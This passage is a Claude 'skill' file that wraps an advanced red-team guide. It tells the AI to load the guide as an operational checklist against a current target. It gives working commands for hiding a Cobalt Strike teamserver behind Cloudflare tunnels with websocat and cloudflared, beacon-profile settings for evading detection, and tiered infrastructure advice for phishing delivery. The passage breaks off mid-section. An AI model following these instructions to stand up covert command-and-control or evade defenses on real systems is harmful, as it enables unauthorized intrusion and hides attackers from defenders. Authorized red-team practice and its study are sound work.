offensive-advanced-redteam

# SKILL: Advanced Redteam Ops

## Metadata
- **Skill Name**: advanced-redteam-ops
- **Folder**: offensive-advanced-redteam
- **Source**: https://github.com/SnailSploit/offensive-checklist/blob/main/Advanced%20red-team%20operations%20for%20dummies.md

## Description
Practical advanced red team operations guide: OPSEC discipline, C2 infrastructure design, living-off-the-land techniques, lateral movement, persistence, data exfiltration, and evading modern defenses. Use for planning advanced red team engagements or understanding APT TTPs.

## Trigger Phrases
Use this skill when the conversation involves any of:
`advanced red team, red team operations, OPSEC, C2 infrastructure, living off the land, LOTL, lateral movement, persistence, exfiltration, APT, advanced threat, red team for dummies`

## Instructions for Claude

When this skill is active:
1. Load and apply the full methodology below as your operational checklist
2. Follow steps in order unless the user specifies otherwise
3. For each technique, consider applicability to the current target/context
4. Track which checklist items have been completed
5. Suggest next steps based on findings

---

## Full Methodology

## Redirectors
Your CStrike, BRC4, etc., team server should ONLY bind locally. NEVER bind to 0.0.0.0 or an external-facing interface; always bind locally and have a redirector/tunnel expose it to the outside world.

On Cloudflare, you can use `Zero Trust` to create a tunnel.
Here's how to host your CStrike **teamserver** behind a redirector.
1. Start your server on your VPS:
	`./TeamServerImage -Dcobaltstrike.server_port=50050 -Dcobaltstrike.server_bindto=127.0.0.1 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=0123456 teamserver 127.0.0.100 lovestrange` ; change lovestrange with your PW. This will bind CS to 127.0.0.1:50050.
	
2. CStrike teamservers and clients (not beacons) use raw TCP. We can't host that directly behind Cloudflare, so we smuggle it within WebSocket traffic with `websocat`:
	1. `websocat -E -b ws-l:SOURCE tcp:DESTINATION &`
	2. source = where `websocat` will listen/where you will point your tunnel. i.e., 127.0.0.1:40000
	3. destination = teamserver's IP + port
	4. final cmd: `websocat -E -b ws-l:127.0.0.1:40000 tcp:127.0.0.1:50050 &`
3. Now, point your tunnel at this address.
	1. For a temporary tunnel, use `cloudflared`:
		1. `cloudflared tunnel --url http://127.0.0.1:40000 --no-autoupdate`
	2. Otherwise, use a named Cloudflare tunnel within Zero Trust, point it to your domain + a specific path (long UUIDs are best), and point it to `http://127.0.0.1:40000`.
**VPS part is done!** Do the following on your machine before starting Cobalt Strike:
4. `websocat -E -b tcp-l:127.0.0.1:2222 ws://mytunnel.domain.com/lovestrange &` ; replace `/lovestrange` with the path you just set OR replace the domain with the link `cloudflared` gave you.
5. Start your Cobalt Strike client and connect to 127.0.0.1:2222.
6. Done :)

If your origin traffic is HTTPS you can skip the websocat part and directly point your Cloudflare tunnel to your service. you can either use Cloudflare's TLS certificate (best) or tell CF not to check origin's TLS cert

Benefits of this: much better OPSEC. A lot of team servers get taken down because they listen eternally and get scanned through Shodan then taken down. You can also use `ngrok` temporary tunnels. Tunneling HTTP is the easiest thing to do.
- The **teamserver ↔ operator** channel is raw TCP (hence `websocat`).
- The **beacon ↔ teamserver** channel is whatever your Malleable profile says (HTTP/S, DNS, etc.) and can live behind the same domain; just use different subdomains/paths.
    Diagram:
```
Operator ──(raw TCP)──► websocat ──(WS)──► cloudflared ──► Internet ──► Cloudflare edge ──► teamserver 127.0.0.1:50050

Beacon ──(HTTPS Malleable)──► same domain/different path ──► Cloudflare edge ─(TLS terminates)─► nginx ──► teamserver 127.0.0.1:443
```

## Beacon Profiles
EDIT THE BASE PROFILE! (you can text me on TG for a good profile)

Never use the default CStrike profile; always edit it as much as you can.
- **Disable Staging:** Unless absolutely necessary for standard shellcode injection, set `host_stage = false`
- Staged payloads are noisy, easier to signature and unnecessary if you are using loaders.
	- CStrike's staged payload is super detected anyway.
- **Mimic Real Traffic:** If you can, don't just randomize; profile legitimate traffic (e.g., Microsoft Teams, standard Azure API chatter) and clone it closely—matching URIs, headers, and User-Agents.
- **Memory Obfuscation:** Ensure your profile includes `set sleep_mask "true";` (encrypts heap while sleeping) and `set obfuscate "true";` (to avoid generic signature scanning in memory). Look at the sleep mask guides for CStrike.
- **Certificate Opsec:** If using HTTPS, never use the default self-signed certs. Use valid certificates (Let's Encrypt is fine) and ensure your C2 profile's `https-certificate` block matches the real certificate exactly (especially the Java Keystore specifics) to avoid fingerprinting.
	- This doesn't matter if your team server is behind an HTTP(S) redirector like `cloudflared` because TLS terminates there anyway. Be sure to set your Cloudflare tunnel to allow self-signed TLS certs.
	- I have seen some orgs ban Let's Encrypt certs altogether, but they are extremely large corporations. If you care about these targets, maybe you can invest in a real TLS cert, no? ;)

## Infrastructure Segregation
Never run all operations from one VPS or domain; use a tiered approach so that burning one asset doesn't kill the engagement:

- **Tier 1 - Phishing/Delivery:** High-reputation domains, typically short-lived. Used ONLY to get the initial payload to the target. Once an email is flagged, this tier is burned. Warm up the domain for ~2 weeks.
    
- **Tier 2 - Interactive C2 (Short-haul):** Used for active hands-on-keyboard work. Higher risk of detection due to frequent traffic.
    
- **Tier 3 - Lo